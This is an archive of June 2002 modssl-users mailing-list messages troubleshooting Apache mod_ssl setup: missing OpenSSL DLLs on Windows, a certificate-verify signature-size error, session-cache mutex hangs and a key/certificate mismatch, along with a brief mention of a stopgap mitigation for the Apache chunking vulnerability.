X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


not sure how it is on winblows machines, but, on unix/linux systems the
modules are found under libexec in the installed apache tree, it maybe
looking for your module in the wrong place?

Thanks,

Ron DuFresne

On Wed, 26 Jun 2002, Andy Soedibjo wrote:

> Hi,
> 
> I tried to install Apache1.3.26 - mod-ssl2.8.9-1.3.26 - OpenSSL0.9.6d in 
> windows2000.
> I think i've succeeded to install everything.
> 
> Now for Apache, i can run it without SSL.
> But, if i try to add LoadModule ssl_module modules/mod_ssl.so
> and run it ... it returns error :
> Syntax error on line 192 of d:/apache/conf/httpd.conf:
> Cannot load /apache/modules/mod_ssl.so into server: (126) The specified 
> module could not be found:
> 
> i'm sure i've put the mod_ssl.so in the modules directory with others 
> Apache modules.
> I've tried to used the full directory LoadModule ssl_module 
> D:/Apache/modules/mod_ssl.so
> but, still get the same error.
> Syntax error on line 192 of d:/apache/conf/httpd.conf:
> Cannot load d:/apache/modules/mod_ssl.so into server: (126) The specified 
> module could not be found:
> 
> Does anyone knows what's wrong? Any suggestion will be accepted.
> 
> Thanks in advance,
> Andy.
> 
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 26 17:19:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA16201; Wed, 26 Jun 2002 17:18:34 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from vega.fmf.uni-lj.si id RAA16074; Wed, 26 Jun 2002 17:17:16 +0200 (MET DST)
Received: (qmail 24970 invoked by uid 0); 26 Jun 2002 15:07:49 -0000
Received: from kristijan@rip-computer.si by vega.fmf.uni-lj.si
	 by uid 100 with qmail-scanner-1.10 (sweep: 2.9/3.54. . Clear:0. Processed in 0.609788 secs); 26 Jun 2002 15:07:49 -0000
X-Virus-Scan: by vega.fmf.uni-lj.si (sweep: 2.9/3.54. )
Received: from vs1.fmf.uni-lj.si (HELO 127.0.0.1) (193.2.110.23)
  by 0 with SMTP; 26 Jun 2002 15:07:48 -0000
Date: Wed, 26 Jun 2002 17:16:45 +0200
From: Kristijan Cafuta RIP 
X-Mailer: The Bat! (v1.60m) Personal
X-Priority: 3 (Normal)
Message-ID: <7567053898.20020626171645@rip-computer.si>
To: Andy Soedibjo 
Subject: Re: Newbies : Apache - mod-ssl error
In-Reply-To: <5.0.0.25.2.20020626161424.028e29e0@popper.montrouge.tt.slb.com>
References: <5.0.0.25.2.20020626161424.028e29e0@popper.montrouge.tt.slb.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kristijan Cafuta RIP 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

The most common mistake on windows is that people forget to copy
ssleay32.dll and libeay32.dll to WINNT\System32...

it returns exactly that error...

did you copy them?


>>Hi,
>>
>>I tried to install Apache1.3.26 - mod-ssl2.8.9-1.3.26 - OpenSSL0.9.6d in 
>>windows2000.
>>I think i've succeeded to install everything.
>>
>>Now for Apache, i can run it without SSL.
>>But, if i try to add LoadModule ssl_module modules/mod_ssl.so
>>and run it ... it returns error :
>>Syntax error on line 192 of d:/apache/conf/httpd.conf:
>>Cannot load /apache/modules/mod_ssl.so into server: (126) The specified 
>>module could not be found:
>>
>>i'm sure i've put the mod_ssl.so in the modules directory with others 
>>Apache modules.
>>I've tried to used the full directory LoadModule ssl_module 
>>D:/Apache/modules/mod_ssl.so
>>but, still get the same error.
>>Syntax error on line 192 of d:/apache/conf/httpd.conf:
>>Cannot load d:/apache/modules/mod_ssl.so into server: (126) The specified 
>>module could not be found:
>>
>>Does anyone knows what's wrong? Any suggestion will be accepted.
>>
>>Thanks in advance,
>>Andy.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 26 17:29:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA17229; Wed, 26 Jun 2002 17:28:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from snmsu2.montrouge.omnes.slb.com id RAA17128; Wed, 26 Jun 2002 17:27:07 +0200 (MET DST)
Received: from snmsu1.montrouge.omnes.slb.com (snmsu1 [163.187.152.2])
	by snmsu2.montrouge.omnes.slb.com (8.9.3/8.9.3) with ESMTP id RAA09288
	for ; Wed, 26 Jun 2002 17:24:53 +0200 (MET DST)
Received: from AHOUANGONOU-ETM.montrouge.sema.slb.com (ttmdy019089.montrouge.tt.slb.com [163.187.19.89])
	by snmsu1.montrouge.omnes.slb.com (8.9.3/8.9.1) with ESMTP id RAA15836
	for ; Wed, 26 Jun 2002 17:20:53 +0200 (MET DST)
Message-Id: <5.0.0.25.2.20020626173540.028e2e58@popper.montrouge.tt.slb.com>
X-Sender: asoedibj@popper.montrouge.tt.slb.com
X-Mailer: QUALCOMM Windows Eudora Version 5.0
Date: Wed, 26 Jun 2002 17:38:30 +0200
To: modssl-users@modssl.org
From: Andy Soedibjo 
Subject: Re: Newbies : Apache - mod-ssl error
In-Reply-To: <7567053898.20020626171645@rip-computer.si>
References: <5.0.0.25.2.20020626161424.028e29e0@popper.montrouge.tt.slb.com>
 <5.0.0.25.2.20020626161424.028e29e0@popper.montrouge.tt.slb.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Andy Soedibjo 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Thanks for all the response ...
It's all my fault ... after i use the Dependency Walker to see the 
mod_ssl.so (dll also) ...
I found there are 3 files not found : ApacheCore.dll, libeay32.dll, and 
ssleay32.dll.
It's all because i don't specify the Apache and OpenSLL bin folder into my 
path.

Now, it works. Thanks for the clue, specially for Kristijan ...

Regards,
Andy.

At 17:16 26/06/2002 +0200, you wrote:
>The most common mistake on windows is that people forget to copy
>ssleay32.dll and libeay32.dll to WINNT\System32...
>
>it returns exactly that error...
>
>did you copy them?
>
>
> >>Hi,
> >>
> >>I tried to install Apache1.3.26 - mod-ssl2.8.9-1.3.26 - OpenSSL0.9.6d in
> >>windows2000.
> >>I think i've succeeded to install everything.
> >>
> >>Now for Apache, i can run it without SSL.
> >>But, if i try to add LoadModule ssl_module modules/mod_ssl.so
> >>and run it ... it returns error :
> >>Syntax error on line 192 of d:/apache/conf/httpd.conf:
> >>Cannot load /apache/modules/mod_ssl.so into server: (126) The specified
> >>module could not be found:
> >>
> >>i'm sure i've put the mod_ssl.so in the modules directory with others
> >>Apache modules.
> >>I've tried to used the full directory LoadModule ssl_module
> >>D:/Apache/modules/mod_ssl.so
> >>but, still get the same error.
> >>Syntax error on line 192 of d:/apache/conf/httpd.conf:
> >>Cannot load d:/apache/modules/mod_ssl.so into server: (126) The specified
> >>module could not be found:
> >>
> >>Does anyone knows what's wrong? Any suggestion will be accepted.
> >>
> >>Thanks in advance,
> >>Andy.
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 26 17:45:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA19180; Wed, 26 Jun 2002 17:44:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from iaweb02.ifmc.org id RAA19096; Wed, 26 Jun 2002 17:43:30 +0200 (MET DST)
Received: from GW5DOM2-MTA by iaweb02.ifmc.org
	with Novell_GroupWise; Wed, 26 Jun 2002 10:43:24 -0500
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 6.0.1
Date: Wed, 26 Jun 2002 10:42:51 -0500
From: "Mary Peterson" 
To: 
Subject: SSL3_GET_CERT_VERIFY:wrong signature size
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mary Peterson" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Can anyone help with this problem???

I am getting the following error in my apache error log when a user is
using their certificate's private key to digitally sign a registration
form on our website.  Does anyone know how to fix this so the error
message doesn't appear?  The signing algorithm is sha1RSA.  Does
something need to be added to the sslciphersuite of the httpd.conf?


[error] mod_ssl: SSL handshake failed (server www.test..org, client
xx.xx.xx.xx) (OpenSSL library error follows)
[error] OpenSSL: error:14088109:SSL routines:SSL3_GET_CERT_VERIFY:wrong
signature size

I would appreciate any assistance that anyone could give.  Thanks!
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 26 18:03:28 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA21327; Wed, 26 Jun 2002 18:02:36 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from romeo.rtfm.com id SAA21175; Wed, 26 Jun 2002 18:01:14 +0200 (MET DST)
Received: (ekr@localhost) by romeo.rtfm.com (8.11.3/8.6.4) id g5QG2Ql42343; Wed, 26 Jun 2002 09:02:27 -0700 (PDT)
To: modssl-users@modssl.org
Subject: Re: SSL3_GET_CERT_VERIFY:wrong signature size
References: 
Mime-Version: 1.0 (generated by tm-edit 7.108)
Content-Type: text/plain; charset=US-ASCII
From: Eric Rescorla 
Date: 26 Jun 2002 09:02:26 -0700
In-Reply-To: "Mary Peterson"'s message of "Wed, 26 Jun 2002 10:42:51 -0500"
Message-ID: 
Lines: 35
X-Mailer: Gnus v5.6.45/XEmacs 20.4 - "Emerald"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Eric Rescorla 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

"Mary Peterson"  writes:

> Can anyone help with this problem???
> 
> I am getting the following error in my apache error log when a user is
> using their certificate's private key to digitally sign a registration
> form on our website.  Does anyone know how to fix this so the error
> message doesn't appear?  The signing algorithm is sha1RSA.  Does
> something need to be added to the sslciphersuite of the httpd.conf?
> 
> 
> [error] mod_ssl: SSL handshake failed (server www.test..org, client
> xx.xx.xx.xx) (OpenSSL library error follows)
> [error] OpenSSL: error:14088109:SSL routines:SSL3_GET_CERT_VERIFY:wrong
> signature size
> 
> I would appreciate any assistance that anyone could give.  Thanks!

Talking about sha1RSA doesn't make sense in the context of SSL client
authentication (which is what this error indicates). All SSL client
authentication (with RSA) uses two hashes, MD5 and SHA-1.

Some questions:
(1) What client are you using?
(2) What exactly are you doing that leads you to believe that
sha1RSA is being used?
(3) Can you get an ssldump trace of this transaction?
Use -NAx so that we get the maximal amount of data.

-Ekr


-- 
[Eric Rescorla                                   ekr@rtfm.com]
                http://www.rtfm.com/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 26 19:05:56 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA28441; Wed, 26 Jun 2002 19:04:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from iaweb02.ifmc.org id TAA28327; Wed, 26 Jun 2002 19:03:19 +0200 (MET DST)
Received: from GW5DOM2-MTA by iaweb02.ifmc.org
	with Novell_GroupWise; Wed, 26 Jun 2002 12:03:13 -0500
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 6.0.1
Date: Wed, 26 Jun 2002 12:02:41 -0500
From: "Mary Peterson" 
To: 
Subject: Re: SSL3_GET_CERT_VERIFY:wrong signature size
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mary Peterson" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

The client is Internet Explorer 5.0.  We do not get the error when we
authenticate to the site, however when a user submits a registration
form they have to digitally sign their registration form with their
private key.  That is when we get the error.  The signing algorithm that
our certificate management system uses is SHA1withRSA.  On the details
of the certificate under Signature Algorithm it says sha1RSA.

I am not familiar with doing an ssldump trace.  I am on a Windows 2000
server.  Can this be done in that environment?

I hope this is enough information for you.  Thanks for your help!

>>> ekr@rtfm.com 06/26/02 11:02AM >>>
"Mary Peterson"  writes:

> Can anyone help with this problem???
> 
> I am getting the following error in my apache error log when a user
is
> using their certificate's private key to digitally sign a
registration
> form on our website.  Does anyone know how to fix this so the error
> message doesn't appear?  The signing algorithm is sha1RSA.  Does
> something need to be added to the sslciphersuite of the httpd.conf?
> 
> 
> [error] mod_ssl: SSL handshake failed (server www.test..org, client
> xx.xx.xx.xx) (OpenSSL library error follows)
> [error] OpenSSL: error:14088109:SSL
routines:SSL3_GET_CERT_VERIFY:wrong
> signature size
> 
> I would appreciate any assistance that anyone could give.  Thanks!

Talking about sha1RSA doesn't make sense in the context of SSL client
authentication (which is what this error indicates). All SSL client
authentication (with RSA) uses two hashes, MD5 and SHA-1.

Some questions:
(1) What client are you using?
(2) What exactly are you doing that leads you to believe that
sha1RSA is being used?
(3) Can you get an ssldump trace of this transaction?
Use -NAx so that we get the maximal amount of data.

-Ekr


-- 
[Eric Rescorla                                   ekr@rtfm.com] 
                http://www.rtfm.com/ 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org

User Support Mailing List                      modssl-users@modssl.org

Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 26 19:25:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA00927; Wed, 26 Jun 2002 19:24:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from romeo.rtfm.com id TAA00899; Wed, 26 Jun 2002 19:24:01 +0200 (MET DST)
Received: (ekr@localhost) by romeo.rtfm.com (8.11.3/8.6.4) id g5QHPBk42492; Wed, 26 Jun 2002 10:25:11 -0700 (PDT)
To: modssl-users@modssl.org
Subject: Re: SSL3_GET_CERT_VERIFY:wrong signature size
References: 
Mime-Version: 1.0 (generated by tm-edit 7.108)
Content-Type: text/plain; charset=US-ASCII
From: Eric Rescorla 
Date: 26 Jun 2002 10:25:10 -0700
In-Reply-To: "Mary Peterson"'s message of "Wed, 26 Jun 2002 12:02:41 -0500"
Message-ID: 
Lines: 19
X-Mailer: Gnus v5.6.45/XEmacs 20.4 - "Emerald"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Eric Rescorla 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

"Mary Peterson"  writes:
> The client is Internet Explorer 5.0.  We do not get the error when we
> authenticate to the site, however when a user submits a registration
> form they have to digitally sign their registration form with their
> private key.  That is when we get the error.  The signing algorithm that
> our certificate management system uses is SHA1withRSA.  On the details
> of the certificate under Signature Algorithm it says sha1RSA.
Ok. This is just the algorithm that the cert was signed with, not
the one that is being used for the signature being verified.

> I am not familiar with doing an ssldump trace.  I am on a Windows 2000
> server.  Can this be done in that environment?
Yes, if you contact me directly I an provide a binary.

-Ekr

-- 
[Eric Rescorla                                   ekr@rtfm.com]
                http://www.rtfm.com/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 26 22:22:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA19068; Wed, 26 Jun 2002 22:21:32 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange00.SC.ESILICON.COM id WAA18977; Wed, 26 Jun 2002 22:20:31 +0200 (MET DST)
Received: by exchange00.SC.ESILICON.COM with Internet Mail Service (5.5.2653.19)
	id ; Wed, 26 Jun 2002 13:20:24 -0700
Message-ID: <691874941F1F954198F7E7FCBAEF1FAE0D205F@exchange00.SC.ESILICON.COM>
From: David Marshall 
To: "'c.bailiff+bugtraq@devsecure.com'" 
Cc: "'modssl-users@modssl.org'" 
Subject: RE: Apache Chunking Exploit
Date: Wed, 26 Jun 2002 13:20:22 -0700
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David Marshall 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I'd like to calrify, my point

I have binary DSO modules from 3rd party companies. I have several
non-source Binary Apache versions from Sun, IBM, Stronghold and Oracle
deployed. Mod_blowchunks has closed the door while I get updates from my
vendors and test them with all the other software that Apache integrates
with. 

I might also add that I was on a tight schedule for another project. I would
not have been able to meet my schedule commitments and install/deploy/test
new Apache versions with my 3rd party DSO's. 

I will be upgrading ASAP. However, I find that I cannot migrate to Apache
2.0.x yet due to 3rd party dependencies. To make a long story short. We have
to stay on Apache 1.3.x until we can migrate to BEA Weblogic 6.1 or 7.x, but
to do so requires us to migrate our portal infrastructure from Weblogic
Commerce Server 3.2 to Weblogic portal 4.0. Due to numerous API changes by
BEA, this project turned into a re-coding of our portal. This project did
not get funded this year. 

I decided to notify the list, because I can't imagine that I'm the only one
with such constraints.

BlowChunks.pl took a day to implement, test and deploy onto 15 systems. I
implemented it as an include file so I can easily remove it. Now my company
is not exposed to what Chunking attacks are looming and I can complete the
current project and then begin the multiple week install/test/deploy cycle
of the updated Apache(s) without being vunerable.

So thanks again Cris!
David
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 26 22:59:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA22601; Wed, 26 Jun 2002 22:58:44 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from rigljica.arnes.si id WAA22504; Wed, 26 Jun 2002 22:57:30 +0200 (MET DST)
Received: from razor.arnes.si (razor.arnes.si [193.2.1.80])
	by rigljica.arnes.si (Postfix) with ESMTP id 04DC06E64D
	for ; Wed, 26 Jun 2002 22:57:25 +0200 (MEST)
Received: from eros (ms4-205i.dial-up.arnes.si [194.249.5.205])
	by razor.arnes.si (Postfix) with SMTP id 3DCA5E5DD
	for ; Wed, 26 Jun 2002 22:57:24 +0200 (MET DST)
Message-ID: <00d401c21d54$1bdb2400$cd05f9c2@eros>
From: "Rok Zevnik" 
To: 
Subject: mutex lock and session cache problem 
Date: Wed, 26 Jun 2002 22:57:39 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-2"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rok Zevnik" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

I have a problem with mod_ssl running apache 2.0.36 on Linux Debian.
The ssl server hangs after couple of HTTPS requests and i have to restart
it.

In log file I get these two warnings when the connection hangs:

[warn]  Failed to acquire global mutex lock
[warn]  Failed to release global mutex lock

I found out that if I change the settings in ssl.conf from
SSLSessionCache         dbm:logs/ssl_scache
SSLSessionCacheTimeout  30

to
SSLSessionCache        none

then everything works OK.


Can anyone help me with this problem?

Thank you,
Rok





Log file when connection works OK

[info]  Connection to child 4 established (server, client)
[info]  Seeding PRNG with 136 bytes of entropy
[trace] OpenSSL: Handshake: start
[trace] OpenSSL: Loop: before/accept initialization
[trace] OpenSSL: Loop: SSLv3 read client hello A
[trace] OpenSSL: Loop: SSLv3 write server hello A
[trace] OpenSSL: Loop: SSLv3 write certificate A
[trace] OpenSSL: Loop: SSLv3 write server done A
[trace] OpenSSL: Loop: SSLv3 flush data
[trace] OpenSSL: Loop: SSLv3 read client key exchange A
[trace] OpenSSL: Loop: SSLv3 read finished A
[trace] OpenSSL: Loop: SSLv3 write change cipher spec A
[trace] OpenSSL: Loop: SSLv3 write finished A
[trace] OpenSSL: Loop: SSLv3 flush data
[trace] OpenSSL: Handshake: done
[info]  Connection: Client IP: 194.249.3.75, Protocol: SSLv3, Cipher:
RC4-MD5 (128/128 bits)
[info]  Initial (No.1) HTTPS request received for child 4 (server)
[info]  Connection to child 4 closed with unclean shutdown(server, client)


Log file when connection hangs:


[info]  Connection to child 4 established (server, client)
[info]  Seeding PRNG with 136 bytes of entropy
[trace] OpenSSL: Handshake: start
[trace] OpenSSL: Loop: before/accept initialization
*****[warn]  Failed to acquire global mutex lock
*****[warn]  Failed to release global mutex lock
[trace] Inter-Process Session Cache (DBM) Expiry: old: 1, new: 0, removed: 1
[trace] Inter-Process Session Cache: request=GET status=MISSED
id=CBDD0F6495EE486FCAED56F8E6B1E8A19E1C27CF1F74C008CFB79D8441CCC532 (session
renewal)
[trace] OpenSSL: Loop: SSLv3 read client hello A
[trace] OpenSSL: Loop: SSLv3 write server hello A
[trace] OpenSSL: Loop: SSLv3 write certificate A
[trace] OpenSSL: Loop: SSLv3 write server done A
[trace] OpenSSL: Loop: SSLv3 flush data
[trace] OpenSSL: Loop: SSLv3 read client key exchange A
[trace] OpenSSL: Loop: SSLv3 read finished A
[trace] OpenSSL: Loop: SSLv3 write change cipher spec A
[trace] OpenSSL: Loop: SSLv3 write finished A
[trace] OpenSSL: Loop: SSLv3 flush data

And here it stops and I have to restart it.




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 26 23:39:25 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA26823; Wed, 26 Jun 2002 23:38:36 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from COHNTFS24.ci.henderson.nv.us id XAA26700; Wed, 26 Jun 2002 23:37:25 +0200 (MET DST)
Received: from gty.ci.henderson.nv.us (gwia.ci.henderson.nv.us) by COHNTFS24.ci.henderson.nv.us
 (Content Technologies SMTPRS 4.2.10) with SMTP id  for ;
 Wed, 26 Jun 2002 14:37:50 -0700
Received: from HENMAIL2-Message_Server by gty.ci.henderson.nv.us
	with Novell_GroupWise; Wed, 26 Jun 2002 14:37:13 -0700
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 5.5.6.1
Date: Wed, 26 Jun 2002 14:37:08 -0700
From: "Jeff Landers" 
To: 
Subject: getting close with apache2, ssl, solaris 8
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id XAA26803
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff Landers" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I am getting the key values mismatch error which seems like it should be pretty basic in that they don't match just like it says. However, I remade the CA, cert request, and signed it using the CA.sh -newca, CA.sh -newreq, and CA.sh -sign  which created the cakey.pem and the newcert.pem. I pointed the Server Private Key directive at the cakey.pem and the Server Certificate directive at the newcert.pem  but still get the mismatch error. I searched the archives for this rookie mistake but can't figure out what I am doing wrong. Point me in the right direction, please. Thank you everyone for all of the help in getting this far. Sign me...

Close but no cigar.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 27 01:02:25 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA04763; Thu, 27 Jun 2002 01:01:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id BAA04709; Thu, 27 Jun 2002 01:00:46 +0200 (MET DST)
Received: from itaction.co.uk ([194.106.52.27]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id GYC58L00.4CI for ; Thu, 27 Jun 2002
          00:00:21 +0100 
Message-ID: <3D1A4787.40606@itaction.co.uk>
Date: Thu, 27 Jun 2002 00:00:23 +0100
From: "Peter Viertel" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0+) Gecko/20020430
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: getting close with apache2, ssl, solaris 8
References: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I think your confusion is in using the cakey when in fact you should use 
the key that you made the cert request from for the Server Private key 
directive....

eg: if you used the following two invocations of  openssl....

openssl genrsa -des3 -out server.key 1024
openssl req -new -key server.key -out server.csr

...then however you get a cert from the csr...(use CA.sh or pay a real 
CA, or sign.sh) . and the cert gets saved as server.crt

then the Apache conf would be:

        SSLCertificateKeyFile conf/ssl.key/server.key
        SSLCertificateFile conf/ssl.crt/server.crt

if I'm not making any sense, then see if the Modssl FAQ is better for 
you : http://www.modssl.org/docs/2.8/ssl_faq.html#cert-real


Jeff Landers wrote:

>I am getting the key values mismatch error which seems like it should be pretty basic in that they don't match just like it says. However, I remade the CA, cert request, and signed it using the CA.sh -newca, CA.sh -newreq, and CA.sh -sign  which created the cakey.pem and the newcert.pem. I pointed the Server Private Key directive at the cakey.pem and the Server Certificate directive at the newcert.pem  but still get the mismatch error. I searched the archives for this rookie mistake but can't figure out what I am doing wrong. Point me in the right direction, please. Thank you everyone for all of the help in getting this far. Sign me...
>
>Close but no cigar.
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 27 01:09:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA05751; Thu, 27 Jun 2002 01:08:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from COHNTFS24.ci.henderson.nv.us id BAA05718; Thu, 27 Jun 2002 01:08:01 +0200 (MET DST)
Received: from gty.ci.henderson.nv.us (gwia.ci.henderson.nv.us) by COHNTFS24.ci.henderson.nv.us
 (Content Technologies SMTPRS 4.2.10) with SMTP id  for ;
 Wed, 26 Jun 2002 16:07:47 -0700
Received: from HENMAIL2-Message_Server by gty.ci.henderson.nv.us
	with Novell_GroupWise; Wed, 26 Jun 2002 16:07:10 -0700
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 5.5.6.1
Date: Wed, 26 Jun 2002 16:07:00 -0700
From: "Jeff Landers" 
To: 
Subject: Re: getting close with apache2, ssl, solaris 8
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id BAA05720
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff Landers" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

That makes sense.  I was pointing at the wrong files. Oops. Thank you everyone for helping the newbie get his first apache ssl server running. I will try to be a giver instead of taker. 

